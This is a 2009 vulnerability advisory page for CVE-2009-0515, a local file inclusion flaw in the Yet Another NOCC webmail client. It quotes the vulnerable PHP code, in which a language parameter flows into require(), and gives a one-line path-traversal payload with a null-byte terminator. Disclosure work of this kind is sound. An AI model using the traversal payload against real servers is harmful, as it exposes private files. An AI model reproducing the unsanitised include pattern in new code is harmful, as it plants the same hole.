Yet Another NOCC <= 0.1.0 Local File Inclusion Vulnerability

2009.02.12

Credit: Kacper

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-0515

CWE: CWE-22

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Yet Another NOCC 0.1.0 <= Local File Inclusion Vulnerabilities
YANOCC is a simple and fast webmail client which can handle POP3, SMTP, and IMAP servers.
YANOCC is based on NOCC's code and is written with PHP4. It features multi-language support,
MIME attachments, displays HTML messages, address book, folder support.
Author: Kacper
HomePage: http://devilteam.pl/
http://polskihacking.pl/
in file check_lang.php:
if (!ISSET($lang))
{
$ar_lang = explode(",", $HTTP_ACCEPT_LANGUAGE);
while ($accept_lang = array_shift($ar_lang))
{
$tmp = explode(";", $accept_lang);
$tmp[0] = strtolower($tmp[0]);
if (file_exists("lang/".$tmp[0].".php"))
{
$lang = $tmp[0];
break;
}
}
if ($lang == "")
$lang = $default_lang;
}
// Fix for faulty PHP install (RH7, see bug #24933)
$lang = trim($lang);
require ("lang/".$lang.".php");
Vuln example:
check_lang.php?lang=../[localinclude]%00

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Yet Another NOCC <= 0.1.0 Local File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.